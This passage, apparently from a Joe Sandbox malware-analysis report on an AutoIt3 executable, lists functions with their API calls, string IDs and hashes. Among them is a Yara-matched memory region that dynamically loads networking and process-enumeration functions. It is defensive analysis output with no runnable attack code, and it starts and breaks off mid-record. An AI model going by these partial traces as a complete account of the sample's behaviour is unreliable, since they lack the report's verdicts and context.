                                      • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 03CDC466
                                      • LoadLibraryA.KERNEL32(wship6.dll,00000000,getnameinfo,00000000,freeaddrinfo,00000000,getaddrinfo,00000000,gethostname,00000000,getservbyport,00000000,getservbyname,00000000,getprotobynumber,00000000), ref: 03CDC4A4
                                      • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 03CDC4C2
                                      • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 03CDC4D7
                                      • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 03CDC4EC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: WSACleanup$WSAGetLastError$WSAIoctl$WSAStartup$__WSAFDIsSet$accept$bind$closesocket$connect$freeaddrinfo$getaddrinfo$gethostbyaddr$gethostbyname$gethostname$getnameinfo$getpeername$getprotobyname$getprotobynumber$getservbyname$getservbyport$getsockname$getsockopt$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$recvfrom$select$send$sendto$setsockopt$shutdown$socket$ws2_32.dll$wship6.dll
                                      • API String ID: 2238633743-3535293950
                                      • Opcode ID: e65bc8a2561621fe4c8ac20fb4f901a36a49232fd68e3c9c3781eafbeaaa1df3
                                      • Instruction ID: 56a2aed77e8fd5d415a710e794d824ad08d2a04bd5d22948f1df990e8386a124
                                      • Opcode Fuzzy Hash: e65bc8a2561621fe4c8ac20fb4f901a36a49232fd68e3c9c3781eafbeaaa1df3
                                      • Instruction Fuzzy Hash: 78B126F9B10380AFDB20FBB5D985A2AB7F8EB25640B058569F911CF319D778D800EB51
                                      Function 00877EF0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00877F45
                                      • DeleteObject.GDI32(00000000), ref: 00877F57
                                      • DestroyWindow.USER32 ref: 00877F65
                                      • GetDesktopWindow.USER32 ref: 00877F7F
                                      • GetWindowRect.USER32(00000000), ref: 00877F86
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 008780C7
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 008780D7
                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0087811F
                                      • GetClientRect.USER32(00000000,?), ref: 0087812B
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00878165
                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878187
                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0087819A
                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781A5
                                      • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781AE
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781BD
                                      • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781C6
                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781CD
                                      • GlobalFree.KERNEL32(00000000), ref: 008781D8
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 008781EA
                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00893C7C,00000000), ref: 00878200
                                      • GlobalFree.KERNEL32(00000000), ref: 00878210
                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00878236
                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00878255
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878277
                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00878464
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 2211948467-2373415609
                                      • Opcode ID: eb5f63f45509aa586fb67cbe139899407c5eb6440f79023473335153e0f9f4cd
                                      • Instruction ID: 81a55ede4a4acffe5f1d6138358aa72912c940b30f142cdfeb950514e7588e87
                                      • Opcode Fuzzy Hash: eb5f63f45509aa586fb67cbe139899407c5eb6440f79023473335153e0f9f4cd
                                      • Instruction Fuzzy Hash: 80022971900519EFDB14AFA8CD89EAE7BB9FB48310F148159F919EB2A1CB709D41CF60
                                      Function 03CEA13C Relevance: 75.4, APIs: 24, Strings: 19, Instructions: 132libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(PSAPI.dll,?,03CEA4B9), ref: 03CEA150
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 03CEA16C
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 03CEA17E
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 03CEA190
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 03CEA1A2
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 03CEA1B4
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 03CEA1C6
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 03CEA1D8
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 03CEA1EA
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 03CEA1FC
                                      • GetProcAddress.KERNEL32(00000000,EmptyWorkingSet), ref: 03CEA20E
                                      • GetProcAddress.KERNEL32(00000000,QueryWorkingSet), ref: 03CEA220
                                      • GetProcAddress.KERNEL32(00000000,InitializeProcessForWsWatch), ref: 03CEA232
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 03CEA244
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 03CEA256
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 03CEA268
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 03CEA27A
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 03CEA28C
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 03CEA29E
                                      • GetProcAddress.KERNEL32(00000000,GetMappedFileNameW), ref: 03CEA2B0
                                      • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameW), ref: 03CEA2C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                      • API String ID: 2238633743-2267155864
                                      • Opcode ID: 399e8e4f8bfe442782b77b33a7f8c19c2da13064fe9bbedb6087bdcd336874fe
                                      • Instruction ID: 20596c60390c4b79531a34d788b6b99d5870bb8e618822a86e0701dbbfe6235d
                                      • Opcode Fuzzy Hash: 399e8e4f8bfe442782b77b33a7f8c19c2da13064fe9bbedb6087bdcd336874fe
                                      • Instruction Fuzzy Hash: B44142FAB10390AFDB51EFB5C98592E77A8EB266403058579F821CF319C378C810AB51
                                      Function 00883BA9 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?,00890980), ref: 00883C65
                                      • IsWindowVisible.USER32(?), ref: 00883C89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharUpperVisibleWindow
                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                      • API String ID: 4105515805-45149045
                                      • Opcode ID: 8068ff2ac5dc26cc09558e890482a909c65648608d03dda300e0323cf5d31931
                                      • Instruction ID: b4133a488a9e73294d420ef1c4ca7ab21f8f009b6dd0b662ab4e442e3f846092
                                      • Opcode Fuzzy Hash: 8068ff2ac5dc26cc09558e890482a909c65648608d03dda300e0323cf5d31931
                                      • Instruction Fuzzy Hash: 8FD16E30204615CBCB14FF58C851AAAB7A5FF94744F144958F986DB3A3DB31EE4ACB82
                                      Function 0088ABFF Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTextColor.GDI32(?,00000000), ref: 0088AC55
                                      • GetSysColorBrush.USER32(0000000F), ref: 0088AC86
                                      • GetSysColor.USER32(0000000F), ref: 0088AC92
                                      • SetBkColor.GDI32(?,000000FF), ref: 0088ACAC
                                      • SelectObject.GDI32(?,?), ref: 0088ACBB
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088ACE6
                                      • GetSysColor.USER32(00000010), ref: 0088ACEE
                                      • CreateSolidBrush.GDI32(00000000), ref: 0088ACF5
                                      • FrameRect.USER32(?,?,00000000), ref: 0088AD04
                                      • DeleteObject.GDI32(00000000), ref: 0088AD0B
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0088AD56
                                      • FillRect.USER32(?,?,?), ref: 0088AD88
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0088ADB3
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(00000012), ref: 0088AF51
                                        • Part of subcall function 0088AF18: SetTextColor.GDI32(?,?), ref: 0088AF55
                                        • Part of subcall function 0088AF18: GetSysColorBrush.USER32(0000000F), ref: 0088AF6B
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(0000000F), ref: 0088AF76
                                        • Part of subcall function 0088AF18: GetSysColor.USER32(00000011), ref: 0088AF93
                                        • Part of subcall function 0088AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088AFA1
                                        • Part of subcall function 0088AF18: SelectObject.GDI32(?,00000000), ref: 0088AFB2
                                        • Part of subcall function 0088AF18: SetBkColor.GDI32(?,00000000), ref: 0088AFBB
                                        • Part of subcall function 0088AF18: SelectObject.GDI32(?,?), ref: 0088AFC8
                                        • Part of subcall function 0088AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0088AFE7
                                        • Part of subcall function 0088AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088AFFE
                                        • Part of subcall function 0088AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0088B013
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                      • String ID:
                                      • API String ID: 4124339563-0
                                      • Opcode ID: 931e4097870f8a9160703c52d1e194b863676167201336300a3873183e32b962
                                      • Instruction ID: d1acff99d873dd20ac3adeb7fa4c89b9ef915f5c907c50b4d5f1d996cfe7da07
                                      • Opcode Fuzzy Hash: 931e4097870f8a9160703c52d1e194b863676167201336300a3873183e32b962
                                      • Instruction Fuzzy Hash: D0A17C72008305AFE715AF64DC08A6BBBA9FF88321F144A1AF962E61E1D771D944CF52
                                      Function 00802FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,?,?), ref: 00803072
                                      • DeleteObject.GDI32(00000000), ref: 008030B8
                                      • DeleteObject.GDI32(00000000), ref: 008030C3
                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 008030CE
                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 008030D9
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0083C77C
                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0083C7B5
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0083CBDE
                                        • Part of subcall function 00801F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00802412,?,00000000,?,?,?,?,00801AA7,00000000,?), ref: 00801F76
                                      • SendMessageW.USER32(?,00001053), ref: 0083CC1B
                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0083CC32
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083CC48
                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0083CC53
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                      • String ID: 0
                                      • API String ID: 464785882-4108050209
                                      • Opcode ID: 77005a2fa28eefe13adae2dbf07ecee1bede55aa16ba8d832747b30eaee49cf1
                                      • Instruction ID: 85d96d0391f3172436dd322443b68e851c799a6a0eac096664a8eb5aaeb5e4c8
                                      • Opcode Fuzzy Hash: 77005a2fa28eefe13adae2dbf07ecee1bede55aa16ba8d832747b30eaee49cf1
                                      • Instruction Fuzzy Hash: 6512AF30605611EFDB65DF28C889BA5BBE5FF88310F144569E885EB2A2C731ED42CF91
                                      Function 008127FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 2660009612-1645009161
                                      • Opcode ID: 204b71a2e9a38ffe19271bd48373f4b37af9a345186f03fb64e7e23970a11f9c
                                      • Instruction ID: 003cbbe9edadd3fcad770926470a259861a3a2a1eb82faa28fe9fe98a62ef16e
                                      • Opcode Fuzzy Hash: 204b71a2e9a38ffe19271bd48373f4b37af9a345186f03fb64e7e23970a11f9c
                                      • Instruction Fuzzy Hash: 7EA1AF30A00219BBCF10AF69DC52EAE7B78FF45740F140029F915EB292EB759AE1D752
                                      Function 00877B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00877BC8
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00877C87
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00877CC5
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00877CD7
                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00877D1D
                                      • GetClientRect.USER32(00000000,?), ref: 00877D29
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00877D6D
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00877D7C
                                      • GetStockObject.GDI32(00000011), ref: 00877D8C
                                      • SelectObject.GDI32(00000000,00000000), ref: 00877D90
                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00877DA0
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00877DA9
                                      • DeleteDC.GDI32(00000000), ref: 00877DB2
                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00877DDE
                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00877DF5
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00877E30
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00877E44
                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00877E55
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00877E85
                                      • GetStockObject.GDI32(00000011), ref: 00877E90
                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00877E9B
                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00877EA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 15a73ef180214ab027daea639f5069f04de4d2d663d7b51c287ef6d31eadfdc0
                                      • Instruction ID: c57f061b081381bdf9d28a3fcca39b1b80da675f234e1f00031febdbd49b002c
                                      • Opcode Fuzzy Hash: 15a73ef180214ab027daea639f5069f04de4d2d663d7b51c287ef6d31eadfdc0
                                      • Instruction Fuzzy Hash: B7A12DB1A40619AFEB149BA8DC4AFAA7BB9FB44710F048115FA15E72E0D770AD00CF64
                                      Function 0086B353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B361
                                      • GetDriveTypeW.KERNEL32(?,00892C4C,?,\\.\,00890980), ref: 0086B43E
                                      • SetErrorMode.KERNEL32(00000000,00892C4C,?,\\.\,00890980), ref: 0086B59C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                      • API String ID: 2907320926-4222207086
                                      • Opcode ID: 4fd01a85212313b3345b8f6a27e423ab884b37b2c0c4262eec9fcbde70799fc5
                                      • Instruction ID: 8004b74338ca6906408f8a303065f40a993770a05c78f2ec9aa79c3c09746839
                                      • Opcode Fuzzy Hash: 4fd01a85212313b3345b8f6a27e423ab884b37b2c0c4262eec9fcbde70799fc5
                                      • Instruction Fuzzy Hash: 10516130B4020DEBCB00EB64C94A9FD77A0FF45748B254026E517E7391DBB6AEC19B5A
                                      Function 0088AF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0088AF51
                                      • SetTextColor.GDI32(?,?), ref: 0088AF55
                                      • GetSysColorBrush.USER32(0000000F), ref: 0088AF6B
                                      • GetSysColor.USER32(0000000F), ref: 0088AF76
                                      • CreateSolidBrush.GDI32(?), ref: 0088AF7B
                                      • GetSysColor.USER32(00000011), ref: 0088AF93
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0088AFA1
                                      • SelectObject.GDI32(?,00000000), ref: 0088AFB2
                                      • SetBkColor.GDI32(?,00000000), ref: 0088AFBB
                                      • SelectObject.GDI32(?,?), ref: 0088AFC8
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0088AFE7
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0088AFFE
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0088B013
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0088B05F
                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0088B086
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0088B0A4
                                      • DrawFocusRect.USER32(?,?), ref: 0088B0AF
                                      • GetSysColor.USER32(00000011), ref: 0088B0BD
                                      • SetTextColor.GDI32(?,00000000), ref: 0088B0C5
                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0088B0D9
                                      • SelectObject.GDI32(?,0088AC1F), ref: 0088B0F0
                                      • DeleteObject.GDI32(?), ref: 0088B0FB
                                      • SelectObject.GDI32(?,?), ref: 0088B101
                                      • DeleteObject.GDI32(?), ref: 0088B106
                                      • SetTextColor.GDI32(?,?), ref: 0088B10C
                                      • SetBkColor.GDI32(?,?), ref: 0088B116
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1996641542-0
                                      • Opcode ID: 7b444625a40ee691a2c6cffc708c30a73f8f610b57ae4085193cafa594b388ce
                                      • Instruction ID: b6941bc4567e88d52d0710580cb4b9c0b17daba28afd723e3e08582ac83ad4f5
                                      • Opcode Fuzzy Hash: 7b444625a40ee691a2c6cffc708c30a73f8f610b57ae4085193cafa594b388ce
                                      • Instruction Fuzzy Hash: 81612B72900618AFDF11AFA8DC48AAE7B79FF08320F154116FA15AB2A1D7759940DF90
                                      Function 00888FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008890EA
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008890FB
                                      • CharNextW.USER32(0000014E), ref: 0088912A
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0088916B
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00889181
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00889192
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008891AF
                                      • SetWindowTextW.USER32(?,0000014E), ref: 008891FB
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00889211
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00889242
                                      • _memset.LIBCMT ref: 00889267
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008892B0
                                      • _memset.LIBCMT ref: 0088930F
